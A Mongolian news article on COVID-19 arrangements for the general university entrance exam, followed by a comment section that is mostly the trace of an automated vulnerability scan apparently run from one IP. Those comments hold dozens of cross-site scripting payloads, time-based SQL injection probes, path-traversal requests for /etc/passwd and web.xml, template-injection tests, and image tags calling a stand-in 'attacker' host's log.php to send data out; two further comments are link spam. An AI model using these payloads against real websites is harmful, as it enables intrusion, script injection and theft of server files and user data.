Элсэлтийн ерөнхий шалгалтын зохион байгуулалт

Н.Алтанцэцэг / Боловсрол

Элсэлтийн ерөнхий шалгалтыг долдугаар сарын 2-5-нд зохион байгуулахаар урьдчилан товлоод буй. Энэ явцад COVID-19-ийн халдвараас урьдчилан сэргийлэх, УОК болон мэргэжлийн хяналтын байгууллагаас гаргасан шийдвэр зөвлөмжийг дагаж мөрдөхөд чиглэсэн арга хэмжээний дагуу шалгуулагчдыг шалгалтын байранд оруулахдаа бөөгнөрөл үүсгэхгүй байх үүднээс суудлын хуваарь дээр тухайн шалгалтыг өгөх шалгалтын байр, шалгалтын байранд ирэх цагийн тов, нэвтрэх хэсгийн дугаарыг тусгайлан зааж өгсөн байгаа. Шалгуулагч заасан цагт, заасан нэвтрэх хэсгийн шалгах цэгүүдээр дамжин шалгуулж, шалгалтын байранд нэвтэрнэ.

1. Сургуулийн гаднах орчин

1.1 Шалгуулагчдыг шалган нэвтрүүлэх гурван хэсгээр нэвтрүүлэх ба нэвтрэх хэсгийн хаягийг тод харагдахуйц бэлтгэж байрлуулсан.

1.2 Шалгуулагч шалгалтын байранд хэрхэн нэвтрэх талаар таниулсан зурагт хуудас, постер мэдээллийг байрлуулсан байгаа тул уншиж танилцах.

1.3 Нэвтрэх хэсэг тус бүрд Шалгуулагч бүр амны хаалт зүүж, биеийн халууныг хэмжүүлэх, гар ариутгах цэгт ариутгал хийсний дараа нэг удаагийн бээлий өгөх, металл илрүүлэгчээр шалгах цэг, бичиг баримт шалгах цэгүүдийн хоорондын зай 2 метрээс багагүй байхаар тооцоолж, хориглох тэмдэг тэмдэглэгээ хийж, хаягжуулсан. /зураглалын дагуу/

1.4 Металл илрүүлэгч ашиглан хувцас, эд хэрэгсэлд үзлэг хийхдээ шалгуулагч бүрээс зөвшөөрөл авах ба шалгуулахаас татгалзсан тохиолдолд шалгалтад оруулахгүй. (Зохион байгуулагчдын бүрэлдэхүүнд тулгуурлан эрэгтэй багш эрэгтэй шалгуулагчдыг, эмэгтэй багш эмэгтэй шалгуулагчдын биед үзлэг хийхээр зохион байгуулсан)

1.5 Шалгуулагчид Элсэлтийн ерөнхий шалгалтын журамд заасны дагуу авч орохыг хориглосон эд зүйлсийг шалгалтын анги танхимд авч орохгүй байх.

2. Сургуулийн доторх орчин

2.1 Шалгалтын байрны орох, гарах хаалга тусдаа байгаа. Сургуулийн коридорын булан, эргэлт, давхар бүрд хаашаа явах болон шалгалтын анги танхим хаана байгааг заасан тэмдэг, тэмдэглэгээ, мэдээллийг ойлгомжтойгоор байршуулсан.

2.2 Шалгалтын анги танхимын ширээ хоорондын зай нь 1.5 – 2 метр байгаа бөгөөд суудлын дугаарыг харагдахуйц байрлуулсан.

2.3 Нийтийн бие засах газар, угаалтуурт дараалал үүсгэхгүй байхаар зохицуулалт хийж, ариутгал халдваргүйжүүлэлтийг тогтмол хийхэд бэлтгэсэн байна.

2.4 Шалгалтын байрны дотор шалгуулагчдад анги танхимаа олоход нь туслах зохион байгуулагч багш нар ажиллана.

2.4 Шалгуулагчдад шалгалтын материалын бүрэн байдлыг шалгах 1 – 2 минутын хугацаа өгнө. Үүний дараа шалгалтыг эхлүүлж, эхэлсэн цаг минут, үргэлжлэх хугацаа, дуусах цаг минутыг ангийн цагаар тохируулан шалгуулагчдад анхааруулан зарлаж, самбарт бичнэ.

Эх сурвалж: Боловсролын үнэлгээний төв


Сэтгэгдэл

sxyltpwohn [36.37.124.100] 2020-11-27 14:01:46

Мэдээ.МН sxyltpwohn http://www.gy062tr05t5p7oc5zds62io473j3rd49s.org/ [url=http://www.gy062tr05t5p7oc5zds62io473j3rd49s.org/]usxyltpwohn[/url] <a href="http://www.gy062tr05t5p7oc5zds62io473j3rd49s.org/">asxyltpwohn</a>

sgxvpbsr [221.202.168.254] 2020-11-20 00:38:27

Мэдээ.МН [url=http://www.gc3d2a492ce2ause67m8i4424n3pj95es.org/]usgxvpbsr[/url] <a href="http://www.gc3d2a492ce2ause67m8i4424n3pj95es.org/">asgxvpbsr</a> sgxvpbsr http://www.gc3d2a492ce2ause67m8i4424n3pj95es.org/

GRLpGpAG [116.113.93.82] 2020-10-29 03:34:56

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:34:53

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:34:50

1

GRLpGpAG"><script>er95(9567)</script> [116.113.93.82] 2020-10-29 03:34:47

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(er95(9893))'bad=" [116.113.93.82] 2020-10-29 03:34:44

1

[116.113.93.82] 2020-10-29 03:34:42

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%65%72%39%35%28%39%34%35%33%29%22 [116.113.93.82] 2020-10-29 03:34:39

1

GRLpGpAG\u0022onmouseover=er95(9862)\u0022 [116.113.93.82] 2020-10-29 03:34:36

1

GRLpGpAG" Gr9b=er95([!+!]) rcO=" [116.113.93.82] 2020-10-29 03:34:34

1

GRLpGpAG"onmouseover=er95(9610)" [116.113.93.82] 2020-10-29 03:34:32

1

GRLpGpAG<g4rRQt< [116.113.93.82] 2020-10-29 03:34:30

1

GRLpGpAG<img sRc='http://attacker-9711/log.php? [116.113.93.82] 2020-10-29 03:34:27

1

GRLpGpAG<0wuZsz x=9397> [116.113.93.82] 2020-10-29 03:34:24

1

GRLpGpAG<ifRAme sRc=9668.com></IfRamE> [116.113.93.82] 2020-10-29 03:34:22

1

GRLpGpAG<W4HCML>R8K3D[!+!]</W4HCML> [116.113.93.82] 2020-10-29 03:34:19

1

GRLpGpAGPXOAI <ScRiPt >er95(9515)</ScRiPt> [116.113.93.82] 2020-10-29 03:34:17

1

GRLpGpAG<% contenteditable onresize=er95(9704)> [116.113.93.82] 2020-10-29 03:34:14

1

GRLpGpAG}body{acu:Expre/**/SSion(er95(9284))} [116.113.93.82] 2020-10-29 03:34:12

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9829);//><!-- --> [116.113.93.82] 2020-10-29 03:34:09

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-29 03:34:06

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-29 03:34:03

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-29 03:34:01

1

GRLpGpAG<input autofocus onfocus=er95(9546)> [116.113.93.82] 2020-10-29 03:33:59

1

[116.113.93.82] 2020-10-29 03:33:56

1

GRLpGpAG<ScRiPt>er95(9646)</sCripT> [116.113.93.82] 2020-10-29 03:33:53

1

GRLpGpAG\u003CScRiPt\er95(9508)\u003C/sCripT\u003E [116.113.93.82] 2020-10-29 03:33:51

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%65%72%39%35%289428%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-29 03:33:49

1

GRLpGpAG<img/src=">" onerror=alert(9001)> [116.113.93.82] 2020-10-29 03:33:46

1

GRLpGpAG<img src=xyz OnErRor=er95(9600)> [116.113.93.82] 2020-10-29 03:33:44

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=er95(9925)> [116.113.93.82] 2020-10-29 03:33:41

1

GRLpGpAG<body onload=er95(9693)> [116.113.93.82] 2020-10-29 03:33:39

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9013'> [116.113.93.82] 2020-10-29 03:33:36

1

GRLpGpAG<isindex type=image src=1 onerror=er95(9080)> [116.113.93.82] 2020-10-29 03:33:34

1

GRLpGpAG<svg [116.113.93.82] 2020-10-29 03:33:31

1

GRLpGpAG<video><source onerror="javascript:er95(9560)"> [116.113.93.82] 2020-10-29 03:33:29

1

GRLpGpAG<ScRiPt >er95(9522)</ScRiPt> [116.113.93.82] 2020-10-29 03:33:26

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9606></ScRiPt> [116.113.93.82] 2020-10-29 03:33:24

1

GRLpGpAG<ScRiPt >er95(9467)</ScRiPt> [116.113.93.82] 2020-10-29 03:33:22

1

GRLpGpAG<ScR<ScRiPt>IpT>er95(9774)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-29 03:33:14

1

GRLpGpAG<script>er95(9264)</script> [116.113.93.82] 2020-10-29 03:33:12

1

GRLpGpAG<W1FN9H>4UGC9[!+!]</W1FN9H> [116.113.93.82] 2020-10-29 03:33:10

1

GRLpGpAG<ScRiPt >er95(9172)</ScRiPt> [116.113.93.82] 2020-10-29 03:33:07

1

{{9999066*10000274}} [116.113.93.82] 2020-10-29 03:33:05

1

acux7698 [116.113.93.82] 2020-10-29 03:33:02

1

acu9575<s1﹥s2ʺs3ʹuca9575 [116.113.93.82] 2020-10-29 03:33:00

1

{{9999024*9999534}} [116.113.93.82] 2020-10-29 03:32:57

1

acux4504 [116.113.93.82] 2020-10-29 03:32:54

1

acu6886<s1﹥s2ʺs3ʹuca6886 [116.113.93.82] 2020-10-29 03:32:52

1

GRLpGpAG9594743 [116.113.93.82] 2020-10-29 03:32:49

1

'"()&%<acx><ScRiPt >er95(9209)</ScRiPt> [116.113.93.82] 2020-10-29 03:32:47

1

GRLpGpAG'"()&%<acx><ScRiPt >er95(9078)</ScRiPt> [116.113.93.82] 2020-10-29 03:32:44

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:42

1<ndp1B8<

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:40

1<img sRc='http://attacker-9250/log.php?

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:37

1<6MYa4E x=9434>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:34

1<ifRAme sRc=9059.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:32

1<WLXYLE>AB7LI[!+!]</WLXYLE>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:30

1g8wlW <ScRiPt >er95(9880)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:27

1<% contenteditable onresize=er95(9672)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:25

1}body{acu:Expre/**/SSion(er95(9065))}

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:22

1<img<!-- --> src=x onerror=alert(9399);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:20

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:18

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:15

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:12

1<input autofocus onfocus=er95(9257)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:10

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:07

1<ScRiPt>er95(9910)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:05

1\u003CScRiPt\er95(9278)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:02

%31%3C%53%63%52%69%50%74%20%3E%65%72%39%35%289876%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-29 03:32:00

1<img/src=">" onerror=alert(9841)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:57

1<img src=xyz OnErRor=er95(9307)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:54

1<img src=//testasp.vulnweb.com/t/dot.gif onload=er95(9302)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:52

1<body onload=er95(9355)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:50

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9568'>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:47

1<isindex type=image src=1 onerror=er95(9509)>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:44

1<svg

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:42

1<video><source onerror="javascript:er95(9232)">

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:41

1<ScRiPt >er95(9028)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:38

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9353></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:35

1<ScRiPt >er95(9338)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:32

1<ScR<ScRiPt>IpT>er95(9139)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:31

1<script>er95(9887)</script>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:28

1<WCWPBZ>SBUEV[!+!]</WCWPBZ>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:26

1<ScRiPt >er95(9699)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:23

{{9999338*9999939}}

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:21

acux10250

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:18

acu9577<s1﹥s2ʺs3ʹuca9577

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:16

19090479

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:16

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:14

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:13

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:13

'"()&%<acx><ScRiPt >er95(9626)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:12

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:12

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:11

1'"()&%<acx><ScRiPt >er95(9211)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:11

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:09

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:08

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:07

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:06

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:06

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:05

1

GRLpGpAG [116.113.93.82<APncak<] 2020-10-29 03:31:05

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:05

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:04

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:04

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:03

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:03

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9108/log.php?] 2020-10-29 03:31:02

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:02

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:02

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:02

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:01

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:01

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:01

1

GRLpGpAG [116.113.93.82<suS56x x=9051>] 2020-10-29 03:31:00

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:31:00

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:59

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:58

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:58

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9718.com></IfRamE>] 2020-10-29 03:30:58

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:57

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:57

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:56

1

GRLpGpAG [116.113.93.82<WIXZBT>JCGGB[!+!]</WIXZBT>] 2020-10-29 03:30:56

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:56

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:55

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:54

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:54

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:53

1

GRLpGpAG [116.113.93.82v6vLD <ScRiPt >er95(9466)</ScRiPt>] 2020-10-29 03:30:53

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:53

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:52

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:52

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=er95(9865)>] 2020-10-29 03:30:51

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:51

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:50

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(er95(9168))}] 2020-10-29 03:30:49

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9421);//><!-- -->] 2020-10-29 03:30:47

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-29 03:30:44

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-29 03:30:42

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-29 03:30:40

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=er95(9099)>] 2020-10-29 03:30:38

1

GRLpGpAG [] 2020-10-29 03:30:36

1

GRLpGpAG [116.113.93.82<ScRiPt>er95(9862)</sCripT>] 2020-10-29 03:30:33

1

GRLpGpAG [116.113.93.82\u003CScRiPt\er95(9617)\u003C/sCripT\u003E] 2020-10-29 03:30:31

1

WEB-INF\web.xml [116.113.93.82] 2020-10-29 03:30:29

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%65%72%39%35%289808%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-29 03:30:28

1

WEB-INF/web.xml [116.113.93.82] 2020-10-29 03:30:28

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:27

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-29 03:30:27

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:26

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9361)>] 2020-10-29 03:30:26

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-29 03:30:25

1

Ek21rIDR'));select pg_sleep(6); -- [116.113.93.82] 2020-10-29 03:30:25

1

file:///etc/passwd [116.113.93.82] 2020-10-29 03:30:24

1

Zd7oKfNA');select pg_sleep(6); -- [116.113.93.82] 2020-10-29 03:30:24

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=er95(9232)>] 2020-10-29 03:30:23

1

Y1kCXvcD';select pg_sleep(3); -- [116.113.93.82] 2020-10-29 03:30:23

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-29 03:30:23

1

.. [116.113.93.82] 2020-10-29 03:30:22

1

Llth1b4I'; waitfor delay '0:0:3' -- [116.113.93.82] 2020-10-29 03:30:22

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-29 03:30:21

1

1 waitfor delay '0:0:9' -- [116.113.93.82] 2020-10-29 03:30:21

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=er95(9625)>] 2020-10-29 03:30:21

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-29 03:30:21

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ [116.113.93.82] 2020-10-29 03:30:21

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:20

1

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z [116.113.93.82] 2020-10-29 03:30:20

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-29 03:30:20

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:19

1

GRLpGpAG [116.113.93.82<body onload=er95(9656)>] 2020-10-29 03:30:19

1

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z [116.113.93.82] 2020-10-29 03:30:18

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-29 03:30:18

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:18

1

if(now()=sysdate(),sleep(3),0) [116.113.93.82] 2020-10-29 03:30:17

1

/etc/passwd [116.113.93.82] 2020-10-29 03:30:17

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:17

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9680'>] 2020-10-29 03:30:16

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-29 03:30:16

1

-1" OR 2+667-667-1=0+0+0+1 -- [116.113.93.82] 2020-10-29 03:30:16

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-29 03:30:15

1

-1' OR 2+357-357-1=0+0+0+1 or 'nZ9sgNri'=' [116.113.93.82] 2020-10-29 03:30:15

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:14

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=er95(9302)>] 2020-10-29 03:30:14

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-29 03:30:13

1

-1' OR 2+358-358-1=0+0+0+1 -- [116.113.93.82] 2020-10-29 03:30:13

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-29 03:30:12

1

-1 OR 2+62-62-1=0+0+0+1 [116.113.93.82] 2020-10-29 03:30:12

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-29 03:30:12

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-29 03:30:12

1

-1 OR 2+635-635-1=0+0+0+1 -- [116.113.93.82] 2020-10-29 03:30:12

1

6X4jhXb1 [116.113.93.82] 2020-10-29 03:30:11

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-29 03:30:11

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-29 03:30:10

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:er95(9643)">] 2020-10-29 03:30:10

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:10

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:08

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:08

WEB-INF\web.xml

GRLpGpAG [116.113.93.82<ScRiPt >er95(9339)</ScRiPt>] 2020-10-29 03:30:07

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:07

WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:07

rYHYWGve'));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:06

XVX1xoOc');select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:06

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:05

859IJm0x';select pg_sleep(9); --

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9446></ScRiPt>] 2020-10-29 03:30:05

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:05

/\../\../\../\../\../\../\../etc/passwd

[116.113.93.82] 2020-10-29 03:30:05

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:04

-1));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:04

file:///etc/passwd

[116.113.93.82] 2020-10-29 03:30:04

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:03

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:03

-1);select pg_sleep(6); --

JyI= [116.113.93.82] 2020-10-29 03:30:03

1

GRLpGpAG [116.113.93.82<ScRiPt >er95(9268)</ScRiPt>] 2020-10-29 03:30:03

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:02

..

@@JuNOw [116.113.93.82] 2020-10-29 03:30:02

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:02

-1;select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:01

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1 [116.113.93.82] 2020-10-29 03:30:01

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:01

wUyRx9yg'; waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>er95(9426)</sCr<ScRiPt>IpT>] 2020-10-29 03:30:01

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:01

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\ [116.113.93.82] 2020-10-29 03:30:01

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:00

1 waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-29 03:30:00

/.././.././.././.././.././.././.././../etc/./passwd%00

1'" [116.113.93.82] 2020-10-29 03:29:59

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:59

-1); waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82<script>er95(9462)</script>] 2020-10-29 03:29:59

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:59

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:58

-1; waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:58

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:58

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:57

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:57

GRLpGpAG [116.113.93.82<WNMXDP>YJHCK[!+!]</WNMXDP>] 2020-10-29 03:29:57

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:56

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:56

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:56

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:56

JyI=

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:55

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:55

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:55

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:54

@@yoYeK

GRLpGpAG [116.113.93.82<ScRiPt >er95(9342)</ScRiPt>] 2020-10-29 03:29:54

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:54

if(now()=sysdate(),sleep(6),0)

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:54

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:54

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:53
